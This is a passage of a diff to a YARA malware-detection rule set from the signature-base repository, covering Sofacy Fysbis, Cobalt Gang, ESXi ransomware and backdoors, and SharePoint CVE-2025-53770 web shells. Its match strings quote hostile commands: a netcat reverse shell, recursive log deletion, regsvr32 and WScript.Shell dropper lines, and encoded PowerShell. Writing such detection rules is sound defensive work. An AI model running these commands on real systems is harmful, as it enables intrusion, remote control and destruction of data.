+		$encrypted_pe_header_shift_210 = { ce 8b d2 1f 2c 62 d2 d5 d2 d2 d2 54 d6 d2 02 d1 d1 d2 }
+		$encrypted_pe_header_shift_211 = { cf 8c d3 20 2d 63 d3 d6 d3 d3 d3 55 d7 d3 03 d2 d2 d3 }
+		$encrypted_pe_header_shift_212 = { d0 8d d4 21 2e 64 d4 d7 d4 d4 d4 56 d8 d4 04 d3 d3 d4 }
+		$encrypted_pe_header_shift_213 = { d1 8e d5 22 2f 65 d5 d8 d5 d5 d5 57 d9 d5 05 d4 d4 d5 }
+		$encrypted_pe_header_shift_214 = { d2 8f d6 23 30 66 d6 d9 d6 d6 d6 58 da d6 06 d5 d5 d6 }
+		$encrypted_pe_header_shift_215 = { d3 90 d7 24 31 67 d7 da d7 d7 d7 59 db d7 07 d6 d6 d7 }
+		$encrypted_pe_header_shift_216 = { d4 91 d8 25 32 68 d8 db d8 d8 d8 5a dc d8 08 d7 d7 d8 }
+		$encrypted_pe_header_shift_217 = { d5 92 d9 26 33 69 d9 dc d9 d9 d9 5b dd d9 09 d8 d8 d9 }
+		$encrypted_pe_header_shift_218 = { d6 93 da 27 34 6a da dd da da da 5c de da 0a d9 d9 da }
+		$encrypted_pe_header_shift_219 = { d7 94 db 28 35 6b db de db db db 5d df db 0b da da db }
+		$encrypted_pe_header_shift_220 = { d8 95 dc 29 36 6c dc df dc dc dc 5e e0 dc 0c db db dc }
+		$encrypted_pe_header_shift_221 = { d9 96 dd 2a 37 6d dd e0 dd dd dd 5f e1 dd 0d dc dc dd }
+		$encrypted_pe_header_shift_222 = { da 97 de 2b 38 6e de e1 de de de 60 e2 de 0e dd dd de }
+		$encrypted_pe_header_shift_223 = { db 98 df 2c 39 6f df e2 df df df 61 e3 df 0f de de df }
+		$encrypted_pe_header_shift_224 = { dc 99 e0 2d 3a 70 e0 e3 e0 e0 e0 62 e4 e0 10 df df e0 }
+		$encrypted_pe_header_shift_225 = { dd 9a e1 2e 3b 71 e1 e4 e1 e1 e1 63 e5 e1 11 e0 e0 e1 }
+		$encrypted_pe_header_shift_226 = { de 9b e2 2f 3c 72 e2 e5 e2 e2 e2 64 e6 e2 12 e1 e1 e2 }
+		$encrypted_pe_header_shift_227 = { df 9c e3 30 3d 73 e3 e6 e3 e3 e3 65 e7 e3 13 e2 e2 e3 }
+		$encrypted_pe_header_shift_228 = { e0 9d e4 31 3e 74 e4 e7 e4 e4 e4 66 e8 e4 14 e3 e3 e4 }
+		$encrypted_pe_header_shift_229 = { e1 9e e5 32 3f 75 e5 e8 e5 e5 e5 67 e9 e5 15 e4 e4 e5 }
+		$encrypted_pe_header_shift_230 = { e2 9f e6 33 40 76 e6 e9 e6 e6 e6 68 ea e6 16 e5 e5 e6 }
+		$encrypted_pe_header_shift_231 = { e3 a0 e7 34 41 77 e7 ea e7 e7 e7 69 eb e7 17 e6 e6 e7 }
+		$encrypted_pe_header_shift_232 = { e4 a1 e8 35 42 78 e8 eb e8 e8 e8 6a ec e8 18 e7 e7 e8 }
+		$encrypted_pe_header_shift_233 = { e5 a2 e9 36 43 79 e9 ec e9 e9 e9 6b ed e9 19 e8 e8 e9 }
+		$encrypted_pe_header_shift_234 = { e6 a3 ea 37 44 7a ea ed ea ea ea 6c ee ea 1a e9 e9 ea }
+		$encrypted_pe_header_shift_235 = { e7 a4 eb 38 45 7b eb ee eb eb eb 6d ef eb 1b ea ea eb }
+		$encrypted_pe_header_shift_236 = { e8 a5 ec 39 46 7c ec ef ec ec ec 6e f0 ec 1c eb eb ec }
+		$encrypted_pe_header_shift_237 = { e9 a6 ed 3a 47 7d ed f0 ed ed ed 6f f1 ed 1d ec ec ed }
+		$encrypted_pe_header_shift_238 = { ea a7 ee 3b 48 7e ee f1 ee ee ee 70 f2 ee 1e ed ed ee }
+		$encrypted_pe_header_shift_239 = { eb a8 ef 3c 49 7f ef f2 ef ef ef 71 f3 ef 1f ee ee ef }
+		$encrypted_pe_header_shift_240 = { ec a9 f0 3d 4a 80 f0 f3 f0 f0 f0 72 f4 f0 20 ef ef f0 }
+		$encrypted_pe_header_shift_241 = { ed aa f1 3e 4b 81 f1 f4 f1 f1 f1 73 f5 f1 21 f0 f0 f1 }
+		$encrypted_pe_header_shift_242 = { ee ab f2 3f 4c 82 f2 f5 f2 f2 f2 74 f6 f2 22 f1 f1 f2 }
+		$encrypted_pe_header_shift_243 = { ef ac f3 40 4d 83 f3 f6 f3 f3 f3 75 f7 f3 23 f2 f2 f3 }
+		$encrypted_pe_header_shift_244 = { f0 ad f4 41 4e 84 f4 f7 f4 f4 f4 76 f8 f4 24 f3 f3 f4 }
+		$encrypted_pe_header_shift_245 = { f1 ae f5 42 4f 85 f5 f8 f5 f5 f5 77 f9 f5 25 f4 f4 f5 }
+		$encrypted_pe_header_shift_246 = { f2 af f6 43 50 86 f6 f9 f6 f6 f6 78 fa f6 26 f5 f5 f6 }
+		$encrypted_pe_header_shift_247 = { f3 b0 f7 44 51 87 f7 fa f7 f7 f7 79 fb f7 27 f6 f6 f7 }
+		$encrypted_pe_header_shift_248 = { f4 b1 f8 45 52 88 f8 fb f8 f8 f8 7a fc f8 28 f7 f7 f8 }
+		$encrypted_pe_header_shift_249 = { f5 b2 f9 46 53 89 f9 fc f9 f9 f9 7b fd f9 29 f8 f8 f9 }
+		$encrypted_pe_header_shift_250 = { f6 b3 fa 47 54 8a fa fd fa fa fa 7c fe fa 2a f9 f9 fa }
+		$encrypted_pe_header_shift_251 = { f7 b4 fb 48 55 8b fb fe fb fb fb 7d ff fb 2b fa fa fb }
+		$encrypted_pe_header_shift_252 = { f8 b5 fc 49 56 8c fc ff fc fc fc 7e 00 fc 2c fb fb fc }
+		$encrypted_pe_header_shift_253 = { f9 b6 fd 4a 57 8d fd 00 fd fd fd 7f 01 fd 2d fc fc fd }
+		$encrypted_pe_header_shift_254 = { fa b7 fe 4b 58 8e fe 01 fe fe fe 80 02 fe 2e fd fd fe }
+		$encrypted_pe_header_shift_255 = { fb b8 ff 4c 59 8f ff 02 ff ff ff 81 03 ff 2f fe fe ff }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and $pdb and $struct and filesize < 20KB
+		filesize < 200KB and ( 1 of ( $encrypted_pe_header_shift_* ) )
 }
-rule SIGNATURE_BASE_Powershdll
+rule SIGNATURE_BASE_Sofacy_Fybis_ELF_Backdoor_Gen1 : FILE
 {
 	meta:
-		description = "Detects hack tool PowerShdll"
+		description = "Detects Sofacy Fysbis Linux Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc0e01ca-77f0-5665-8b1e-48c8e947d0d3"
-		date = "2017-08-03"
-		modified = "2023-12-05"
-		reference = "https://github.com/p3nt4/PowerShdll"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershdll.yar#L9-L25"
+		id = "c6abf33e-9c5b-5e0f-b7f0-a0741bf9cc3a"
+		date = "2016-02-13"
+		modified = "2023-01-27"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_fysbis.yar#L9-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6c93eca642cc29e6ce661e6ea975bc1a88fff4e6a4825c1da3f82b3a6701392a"
-		score = 75
+		logic_hash = "fb5239aa75512c8c83b066e64b75469f90fb22cb0918af1e44edb29e7ab38206"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4d33bc7cfa79d7eefc5f7a99f1b052afdb84895a411d7c30045498fd4303898a"
-		hash2 = "f999db9cc3a0719c19f35f0e760f4ce3377b31b756d8cd91bb8270acecd7be7d"
+		hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
+		hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
 
 	strings:
-		$x1 = "rundll32 PowerShdll,main -f <path>" fullword wide
-		$x2 = "\\PowerShdll.dll" ascii
-		$x3 = "rundll32 PowerShdll,main <script>" fullword wide
+		$x1 = "Your command not writed to pipe" fullword ascii
+		$x2 = "Terminal don`t started for executing command" fullword ascii
+		$x3 = "Command will have end with \\n" fullword ascii
+		$s1 = "WantedBy=multi-user.target' >> /usr/lib/systemd/system/" ascii
+		$s2 = "Success execute command or long for waiting executing your command" fullword ascii
+		$s3 = "ls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|SUSE*|release\"" fullword ascii
+		$s4 = "rm -f /usr/lib/systemd/system/" ascii
+		$s5 = "ExecStart=" fullword ascii
+		$s6 = "<table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x457f and filesize < 500KB and 1 of ( $x* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) )
 }
-
-rule SIGNATURE_BASE_Cmstar_Malware_Sep17 : FILE
+rule SIGNATURE_BASE_Sofacy_Fysbis_ELF_Backdoor_Gen2 : FILE
 {
 	meta:
-		description = "Detects CMStar Malware"
+		description = "Detects Sofacy Fysbis Linux Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d6c9cd7f-06ce-5641-b9b2-c81daf18628d"
-		date = "2017-10-03"
+		id = "d4e3a8bb-b23a-53a4-b5fb-b321a3417b43"
+		date = "2016-02-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/pTffPA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cmstar.yar#L13-L31"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_fysbis.yar#L37-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "498b6a3e02cf4979babe6379c2d6b3529d2a28210d44a8ce05aef1acdd325953"
-		score = 75
+		logic_hash = "1d50a789e9c43fce27f3ad390cbdd9533c61e4f263cec1aa1abfba6545e55c57"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "16697c95db5add6c1c23b2591b9d8eec5ed96074d057b9411f0b57a54af298d5"
+		hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
+		hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
+		hash3 = "fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61"
 
 	strings:
-		$s1 = "UpdateService.tmp" fullword ascii
-		$s2 = "StateNum:%d,FileSize:%d" fullword ascii
+		$s1 = "RemoteShell" ascii
+		$s2 = "basic_string::_M_replace_dispatch" fullword ascii
+		$s3 = "HttpChannel" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "22021985de78a48ea8fb82a2ff9eb693" or pe.exports ( "WinCred" ) or all of them )
+		uint16( 0 ) == 0x457f and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_CN_Group_Beacondropper_Aug17 : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_SH_Esxi_Attacks_Feb23_1 : FILE
 {
 	meta:
-		description = "Detects Script Dropper of Cobalt Gang used in August 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5631b0bc-9e25-524a-9003-73779fd492f7"
-		date = "2017-08-09"
+		description = "Detects script used in ransomware attacks exploiting and encrypting ESXi servers - file encrypt.sh"
+		author = "Florian Roth"
+		id = "7178dbe4-f573-5279-a23e-9bab8ae8b743"
+		date = "2023-02-04"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cobaltgang.yar#L15-L39"
+		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-14"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L6-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "89db9c5f09afc9cb54fb7a9cd1490373c568ac4dc04bdb9ef71136f91e16ad2c"
-		score = 75
-		quality = 85
+		logic_hash = "1143ee36603f604874432ee280314a9f62ffe64e58ec5cd4eb114b7b175b365a"
+		score = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc0fad39b461eb1cfc6be57932993fcea94fca650564271d1b74dd850c81602f"
-		hash2 = "1c845bb0f6b9a96404af97dcafdc77f1629246e840c01dd9f1580a341f554926"
-		hash3 = "6206e372870ea4f363be53557477f9748f1896831a0cdef3b8450a7fb65b86e1"
+		hash1 = "10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459"
 
 	strings:
-		$x1 = "WriteLine(\"(new ActiveXObject('WScript.Shell')).Run('cmd /c c:/" ascii
-		$x2 = "WriteLine(\" (new ActiveXObject('WScript.Shell')).Run('regsvr32 /s" ascii
-		$x3 = "sh.Run(env('cmd /c set > %temp%" ascii
-		$x4 = "sh.Run('regsvr32 /s /u /i:" ascii
-		$x5 = ".Get('Win32_ScheduledJob').Create('regsvr32 /s /u /i:" ascii
-		$x6 = "scrobj.dll','********" ascii
-		$x7 = "www.thyssenkrupp-marinesystems.org" fullword ascii
-		$x8 = "f.WriteLine(\" tLnk=env('%tmp%/'+lnkName+'.lnk');\");" fullword ascii
-		$x9 = "lnkName='office 365'; " fullword ascii
-		$x10 = ";sh=x('WScript.Shell');" ascii
+		$x1 = "/bin/find / -name *.log -exec /bin/rm -rf {} \\;" ascii fullword
+		$x2 = "/bin/touch -r /etc/vmware/rhttpproxy/config.xml /bin/hostd-probe.sh" ascii fullword
+		$x3 = "grep encrypt | /bin/grep -v grep | /bin/wc -l)" ascii fullword
+		$s1 = "## ENCRYPT" ascii fullword
+		$s2 = "/bin/find / -name *.log -exec /bin" ascii fullword
 
 	condition:
-		( filesize < 200KB and 1 of them )
+		uint16( 0 ) == 0x2123 and filesize < 10KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_Cobaltgang_Malware_Aug17_1 : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_ELF_Esxi_Attacks_Feb23_1 : FILE
 {
 	meta:
-		description = "Detects a Cobalt Gang malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "56c6f4f8-ccf5-5665-ac21-67f0a9b67cf1"
-		date = "2017-08-09"
+		description = "Detects ransomware exploiting and encrypting ESXi servers"
+		author = "Florian Roth"
+		id = "d0a813aa-41f8-57df-b708-18ccb0d7a3e5"
+		date = "2023-02-04"
 		modified = "2023-12-05"
-		reference = "https://sslbl.abuse.ch/intel/6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cobaltgang.yar#L41-L57"
+		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-14"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L30-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "46077106bd19dd38a714a220b887742f5a29424ac8eb89f469975f863b3782ec"
-		score = 75
+		logic_hash = "27ff018574323c10821993c30cf74de15121caa92a308fbcae4eceae954e63b6"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6d70673b723f338b3febc9f1d69463bdd4775539cb92b5a5d8fccc0d977fa2f0"
+		hash1 = "11b1b2375d9d840912cfd1f0d0d04d93ed0cddb0ae4ddb550a5b62cd044d6b66"
 
 	strings:
-		$s1 = "ServerSocket.EXE" fullword wide
-		$s2 = "Incorrect version of WS2_32.dll found" fullword ascii
-		$s3 = "Click 'Connect' to Connect to the Server.  'Disconnect' to disconnect from server." fullword wide
-		$s4 = "Click 'Start' to start the Server.  'Stop' to Stop it." fullword wide
+		$x1 = "usage: encrypt <public_key> <file_to_encrypt> [<enc_step>] [<enc_size>] [<file_size>]" ascii fullword
+		$x2 = "[ %s ] - FAIL { Errno: %d }" ascii fullword
+		$s1 = "lPEM_read_bio_RSAPrivateKey" ascii fullword
+		$s2 = "lERR_get_error" ascii fullword
+		$s3 = "get_pk_data: key file is empty!" ascii fullword
+		$op1 = { 8b 45 a8 03 45 d0 89 45 d4 8b 45 a4 69 c0 07 53 65 54 89 45 a8 8b 45 a8 c1 c8 19 }
+		$op2 = { 48 89 95 40 fd ff ff 48 83 bd 40 fd ff ff 00 0f 85 2e 01 00 00 48 8b 9d 50 ff ff ff 48 89 9d 30 fd ff ff 48 83 bd 30 fd ff ff 00 78 13 f2 48 0f 2a 85 30 fd ff ff }
+		$op3 = { 31 55 b4 f7 55 b8 8b 4d ac 09 4d b8 8b 45 b8 31 45 bc c1 4d bc 13 c1 4d b4 1d }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+		uint16( 0 ) == 0x457f and filesize < 200KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_Cobaltgang_Malware_Aug17_2 : FILE
+rule SIGNATURE_BASE_APT_PY_Esxi_Backdoor_Dec22 : FILE
 {
 	meta:
-		description = "Detects a Cobalt Gang malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2839c119-0fa4-51f0-a406-5d381cc594a2"
-		date = "2017-08-09"
+		description = "Detects Python backdoor found on ESXi servers"
+		author = "Florian Roth"
+		id = "f0a3b9b9-0031-5d9f-97f8-70f83863ee63"
+		date = "2022-12-14"
 		modified = "2023-12-05"
-		reference = "https://sslbl.abuse.ch/intel/6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cobaltgang.yar#L59-L72"
+		reference = "https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L58-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "54095d2f447b6478aefe956133fb9b97171c1e07d7d9186a70bf242a094e4156"
-		score = 75
+		logic_hash = "86b628f007720aa706c30d91e845d867ed481d1e99bcc9315c84a4e0b7b1b2a6"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "80791d5e76782cc3cd14f37f351e33b860818784192ab5b650f1cdf4f131cf72"
 
 	strings:
-		$s1 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENGB)" fullword ascii
+		$x1 = "cmd = str(base64.b64decode(encoded_cmd), " ascii
+		$x2 = "sh -i 2>&1 | nc %s %s > /tmp/" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		filesize < 10KB and 1 of them or all of them
 }
-
-rule SIGNATURE_BASE_MAL_CRIME_Cobaltgang_Malware_Oct19_1 : FILE
+rule SIGNATURE_BASE_APT_SH_Esxi_Backdoor_Dec22 : FILE
 {
 	meta:
-		description = "Detects CobaltGang malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "95c16016-b09b-56f3-b5a4-fca18ac70ad5"
-		date = "2019-10-24"
+		description = "Detects malicious script found on ESXi servers"
+		author = "Florian Roth"
+		id = "983ac20c-2e61-5365-8849-b3aeb999f909"
+		date = "2022-12-14"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/vxsh4d0w/status/1187353649015611392"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cobaltgang.yar#L74-L95"
+		reference = "https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L73-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4bd57aa6929b3eced7dee8063d89c542f2c80f802ef40efc23bbea6cc8ffd98c"
+		logic_hash = "155a90a6c55b99285555634d91a66fca9c7e7297f05314fa4d6ce1d84257ee11"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "72125933265f884ceb8ab64ab303ea76aaeb7877faee8976d398acd0d0b7356b"
-		hash2 = "893339624602c7b3a6f481aed9509b53e4e995d6771c72d726ba5a6b319608a7"
-		hash3 = "3c34bbf641df25f9accd05b27b9058e25554fdfea0e879f5ca21ffa460ad2b01"
-
-	strings:
-		$op_a1 = { 0f 44 c2 eb 0a 31 c0 80 fa 20 0f 94 c0 01 c0 5d }
-		$op_b1 = { 89 e5 53 8b 55 08 8b 4d 0c 8a 1c 01 88 1c 02 83 }
-		$op_b2 = { 89 e5 53 8b 55 08 8b 45 0c 8a 1c 0a 88 1c 08 83 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( pe.imphash ( ) == "d1e3f8d02cce09520379e5c1e72f862f" or pe.imphash ( ) == "8e26df99c70f79cb8b1ea2ef6f8e52ac" or ( $op_a1 and 1 of ( $op_b* ) ) )
-}
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Sharepoint_Drop_CVE_2025_53770_Jul25 : CVE_2025_53770 FILE
-{
-	meta:
-		description = "Detects ASPX web shell dropped during the exploitation of SharePoint RCE vulnerability CVE-2025-53770"
-		author = "Florian Roth"
-		id = "136ab1a3-647b-5196-9e08-12c3b913bd55"
-		date = "2025-07-20"
-		modified = "2025-07-25"
-		reference = "https://research.eye.security/sharepoint-under-siege/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_jul25.yar#L1-L20"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "27c45b8ed7b8a7e5fff473b50c24028bd028a9fe8e25e5cea2bf5e676e531014"
-		hash = "92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514"
-		hash = "b336f936be13b3d01a8544ea3906193608022b40c28dd8f1f281e361c9b64e93"
-		logic_hash = "3c7bb848fc73418d5a3ecae6e9f637a7d07bf45a75b1bd0a278fdbfae428d619"
-		score = 80
-		quality = 85
-		tags = "CVE-2025-53770, FILE"
-
-	strings:
-		$x1 = "var sy = System.Reflection.Assembly.Load(" ascii
-		$x2 = "Response.Write(cg.ValidationKey+" ascii
-		$s1 = "<script runat=\"server\" language=\"c#\" CODEPAGE=\"65001\">" ascii fullword
-
-	condition:
-		filesize < 4KB and 1 of ( $x* ) or all of them
-}
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Compiled_Sharepoint_Drop_CVE_2025_53770_Jul25_2 : CVE_2025_53770 FILE
-{
-	meta:
-		description = "Detects compiled ASPX web shell dropped during the exploitation of SharePoint RCE vulnerability CVE-2025-53770"
-		author = "Florian Roth, Marius Benthin"
-		id = "2feef057-7100-59d5-83f1-cee3bd5bd791"
-		date = "2025-07-20"
-		modified = "2025-07-25"
-		reference = "https://research.eye.security/sharepoint-under-siege/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_jul25.yar#L22-L51"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8d3d3f3a17d233bc8562765e61f7314ca7a08130ac0fb153ffd091612920b0f2"
-		hash = "d8ca5e5d6400ac34ac4cc138efa89d2ec4d5c0e968a78fa3ba5dbc04c7550649"
-		hash = "7e9b77da1f51d03ee2f96bc976f6aeb781f801cf633862a4b8c356cbb555927d"
-		logic_hash = "df11e5bd293cf094f3a147b54ecaafbe0804d7d575fcc22f38e77ab155c7ebdc"
-		score = 75
-		quality = 58
-		tags = "CVE-2025-53770, FILE"
-
-	strings:
-		$x1 = /App_Web_spinstall\d{0,1}.aspx/ wide
-		$x2 = /spinstall[\w]?[\._]aspx/ ascii
-		$x3 = /\/_layouts\/1[0-9]\/spinstall/ wide
-		$x4 = /\/_layouts\/1[0-9]\/ghostfile/ wide
-		$s1 = "System.Web.Configuration.MachineKeySection" wide
-		$s2 = "Page_load" ascii fullword
-		$s3 = "GetApplicationConfig" wide fullword
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or all of ( $s* ) ) or 2 of ( $x* ) or 4 of them
-}
-rule SIGNATURE_BASE_APT_EXPL_Sharepoint_CVE_2025_53770_Forensicartefact_Jul25_1 : CVE_2025_53770
-{
-	meta:
-		description = "Detects URIs accessed during the exploitation of SharePoint RCE vulnerability CVE-2025-53770"
-		author = "Florian Roth"
-		id = "845e08bc-a02f-5ca0-8acb-39c58d38d523"
-		date = "2025-07-20"
-		modified = "2025-07-23"
-		reference = "https://research.eye.security/sharepoint-under-siege/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_jul25.yar#L53-L71"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cca885bad087d1ed12f00ccad558bb474027f7cce058be76360df31c9499e771"
-		score = 75
-		quality = 56
-		tags = "CVE-2025-53770"
 
 	strings:
-		$sa1 = /POST \/_layouts\/1[0-9]\/ToolPane\.aspx/ ascii wide nocase
-		$sa2 = "DisplayMode=Edit&a=/ToolPane.aspx" ascii wide
-		$sb1 = /GET \/_layouts\/1[0-9]\/spinstall/ ascii wide
-		$sb2 = "/_layouts/SignOut.aspx 200" ascii wide nocase
+		$x1 = "mv /bin/hostd-probe.sh /bin/hostd-probe.sh.1" ascii fullword
+		$x2 = "/bin/nohup /bin/python -u /store/packages/vmtools.py" ascii
+		$x3 = "/bin/rm /bin/hostd-probe.sh.1"
 
 	condition:
-		(@sa2 - @sa1 ) < 700 or ( @sb2 - @sb1 ) < 700 or ( @sb2 - @sa1 ) < 700
+		filesize < 10KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_EXPL_Sharepoint_CVE_2025_53770_Forensicartefact_Jul25_2 : CVE_2025_53770
+rule SIGNATURE_BASE_MAL_RANSOM_SH_Esxi_Attacks_Feb23_2 : FILE
 {
 	meta:
-		description = "Detects URIs accessed during the exploitation of SharePoint RCE vulnerability CVE-2025-53770"
+		description = "Detects script used in ransomware attacks exploiting and encrypting ESXi servers"
 		author = "Florian Roth"
-		id = "57c2caf8-6458-51d5-80c5-8ceee2f55072"
-		date = "2025-07-20"
-		modified = "2025-07-24"
-		reference = "https://research.eye.security/sharepoint-under-siege/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_jul25.yar#L73-L102"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "30955794792a7ce045660bb1e1917eef36f1d5865891b8110bf982382b305b27"
-		hash = "b336f936be13b3d01a8544ea3906193608022b40c28dd8f1f281e361c9b64e93"
-		logic_hash = "5ae0620e7e1c1908ad54ac4e41c53240f738631c20577fd65fb29008945347a8"
-		score = 70
-		quality = 85
-		tags = "CVE-2025-53770"
-
-	strings:
-		$x1 = "-EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0" ascii wide
-		$x2 = "TEMPLATE\\LAYOUTS\\spinstall" ascii wide
-		$x3 = "TEMPLATE\\LAYOUTS\\ghostfile" ascii wide
-		$x4 = "TEMPLATE\\LAYOUTS\\1.css" ascii wide
-		$x5 = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 /_layouts/SignOut.aspx" ascii wide
-		$xe1 = "TQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUwBcA"
